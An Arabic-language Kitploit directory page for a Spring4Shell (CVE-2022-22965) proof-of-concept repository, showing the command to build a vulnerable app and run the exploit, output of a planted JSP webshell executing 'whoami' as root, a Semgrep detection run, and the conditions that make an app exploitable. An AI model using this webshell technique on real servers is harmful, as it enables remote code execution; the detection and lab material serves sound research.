Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
springshell-rce-poc — CVE-2022-22965 - عودة CVE-2010-1622 | Kitploit
أدوات/GitHubGitHub/dduarte/springshell-rce-poc
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubdduarte/springshell-rce-poc

springshell-rce-poc

CVE-2022-22965 - عودة CVE-2010-1622

عرض المستودع
1912منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-22965 - التطبيق المعرض للثغرة وPoC

التجربة والخطأ

root@kitploit:~
$ docker rm -f rce; docker build -t rce:latest . && docker run -d -p 8080:8080 --name rce rce:latest && sleep 5 && python poc.py

مثال على الإخراج

root@kitploit:~
rce
sha256:f626a2190dc0790c610afd4f12a4b2482b6a726d671fdac1432275de89c07cd6
1a048e5725f754d331de9491d0750c4c7a163472dea1fd1554edccfd00d7f6e5
deploy <Response [200]>
webshell <Response [404]>
webshell <Response [404]>
webshell <Response [404]>
webshell <Response [404]>
webshell <Response [500]>
webshell http://localhost:8080/tomcatwar.jsp?cmd=whoami
root

الكشف باستخدام Semgrep

root@kitploit:~
$ semgrep --config=semgrep-rule.yml .

قاعدة Semgrep وحالات الاختبار

مثال على الإخراج

root@kitploit:~
Findings:

  src/main/java/com/example/demo/controller/IndexController.java
     cve-2022-22965
        Semgrep found a match


         14┆ @RequestMapping("/index")
         15┆ public void index(EvalBean evalBean) {
         16┆
         17┆ }

Ran 1 rule on 3 files: 1 finding.

متطلبات التطبيق المعرض للثغرة1

  • JDK 9 أو أحدث
  • Tomcat مستقل (بدون Tomcat مضمّن) مع نشر WAR
  • أي إصدار Spring قبل 5.3.18 / 5.2.20 (Spring Boot قبل 2.5.12 / 2.6.6)
  • لا توجد قائمة حظر على WebDataBinder / InitBinder
  • ربط البارامترات مع POJOs مباشرة (بدون @RequestBody، @RequestQuery، إلخ.)
  • نظام ملفات قابل للكتابة (مثل webapps/ROOT)

المصادر

  • https://twitter.com/vxunderground/status/1509170582469943303 / https://github.com/craig/SpringCore0day
  • https://github.com/fengguangbin/spring-rce-war

Footnotes

  1. بافتراض استغلالات مشابهة لتلك المعروفة في PoCs. قد توجد gadgets أخرى... ↩

تنزيل الأداة